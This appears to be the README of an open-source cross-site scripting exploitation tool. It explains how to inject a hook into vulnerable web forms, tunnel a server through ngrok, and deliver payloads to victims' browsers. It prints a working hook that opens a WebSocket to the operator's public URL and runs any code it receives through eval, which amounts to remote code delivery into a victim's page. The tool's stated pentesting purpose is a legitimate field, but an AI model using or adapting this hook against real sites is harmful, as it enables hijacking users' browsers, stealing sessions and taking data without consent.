Simple-XSS is a multi-platform cross-site scripting (XSS) vulnerability exploitation tool for pentesting. This application will help you create a hook that can easily and reliably catch a client by downloading a payload to their browser and executing it. You don't even need a white IP for this because the application will take care of tunneling the connection between you and the victim.
Disclaimer: This program is provided for educational and research purposes only. The creator of this program does not condone or support any illegal or malicious activity, and will not be held responsible for any such actions taken by others who may use this program. By downloading or using this program, you acknowledge that you are solely responsible for any consequences that may result from the use of this program.
Firstly, choose the hook. Default hook is the simplest hook, it is only suitable for forms without XSS protection:
Then, choose the payload. Hello world payload is an example payload, it just alerts "Hello, World!":
Now, lets set up tunneling. Tunneling is needed to make a local server public. You have 2 options:
- use one of the suggested tunneling apps (now it's only ngrok)
- tunnel ports yourself and pass the public URL of the HTTP tunnel to the program
Finally, you can run the process!
Now you can copy the hook and start hunting ;D
To demonstrate the possibilities, we can use site xss-game.appspot.com. Enter the hook into search form:
Press "Search". As you can see, we have the alert dialog!
Also, we have "Hello, World!" in our console:
Hooks folder: hooks
Hook is an HTML code snippet designed to be embedded in a vulnerable XSS form. It looks like:
<script>c = new WebSocket('{{environment.public_url}}');c.onmessage = (e) => eval(e.data);</script>
NOTE: As you can see here is a built-in variable: {{environment.public_url}}. You can read more about this below.
This is a default hook. When it's embedded in the vulnerable form, it downloads the JS code (payload) via WebSockets protocol from the server and executes it using eval.
Hook has the following structure:
|
+-- hook_folder
|
+-- hook.html
|
+-- package.toml
hook.html - main file, contains HTML code that can be embedded in vulnerable form.
package.toml - metadata file, contains data about hook such as name, description, author and version.
Payloads folder: payloads
Payload is an arbitrary JS code that loaded by hook on a vulnerable page and executed with eval.
Payload has the following structure:
|
+-- payload_folder
|
+-- payload.js
|
+-- package.toml
|
+-- init.py
payload.js - main file, contains arbitrary JS code.
package.toml - metadata file, contains data about payload such as name, description, author and version.
init.py - python file, imported when loading payload. Allows you to interact with the client side of payload (payload.js) via WebSockets protocol.
Built-in objects is an objects passed into hook & payload main files using Jinja templating engine. It contains additional information that may be needed when loading a hook or payload.
- public_url - public address of WebSocket server
package - hook or payload
- name - name of package
- author - package author
- version - version of package
- description - package description
If you need to use some variable, just use such construction: {{object.variable}}. For example:
alert('{{metadata.name}} - V{{metadata.version}}')
The provided payload code snippet will display an alert dialog showcasing the name and version of the payload.
Thanks to the use of the Python Flet framework, the application works equally well both in the browser and in the graphical interface.
First you need to clone the repository:
git clone https://github.com/CrazyProger1/Simple-XSS
Then go to the folder & install requirements:
cd Simple-XSS
pip install -r windows_requirements.txt
And finally you can run it:
python main.py
First you need to clone the repository:
git clone https://github.com/CrazyProger1/Simple-XSS
Then go to the folder & install requirements:
cd Simple-XSS
pip install -r linux_requirements.txt
And finally you can run it:
python main.py
Simple-XSS is released under the MIT License. See the bundled LICENSE file for details.